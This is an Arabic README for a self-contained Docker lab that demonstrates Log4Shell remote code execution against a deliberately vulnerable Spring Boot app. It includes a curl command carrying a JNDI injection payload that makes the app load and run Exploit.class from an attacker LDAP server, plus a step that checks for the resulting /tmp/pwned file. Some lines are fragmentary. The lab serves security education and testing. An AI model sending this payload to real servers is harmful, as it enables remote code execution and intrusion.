
عرض استغلال RCE قائم على Docker لـ Log4Shell (CVE-2021-44228) مع تطبيق Spring Boot ضعيف وخادم LDAP خبيث وتسليم الحمولة عبر حقن JNDI.
يحاكي هذا المشروع سيناريو هجوم تنفيذ الأوامر عن بُعد (RCE) عبر ثغرة Log4Shell في مكتبة Apache Log4j 2.
Exploit.class.يتطلب تثبيت Docker و Docker Compose.
docker compose up --build
انتظر حتى يصبح كلا الحاويتين جاهزين. سيعمل vulnerable-app على المنفذ 8080.
افتح طرفية جديدة وأرسل طلباً يحتوي على حمولة JNDI عبر الترويسة X-Api-Version:
curl -H 'X-Api-Version: ${jndi:ldap://attacker:1389/Exploit}' http://localhost:8080/
vulnerable-app. ستلاحظ أن الحمولة قد تم تسجيلها.attacker. ستلاحظ أن اتصال LDAP تم توجيهه إلى خادم HTTP./tmp/pwned قد أُنشئ داخل الحاوية vulnerable-app:docker exec -it vulnerable-app ls -la /tmp/pwned
إذا كان الملف موجوداً، فهذا يثبت أنه تم تنفيذ الشيفرة الخبيثة Exploit.class بنجاح!
هذا المشروع لأغراض تعليمية وبحثية في مجال الأمن فقط. يُمنع منعاً باتاً استخدامه لأغراض غير قانونية.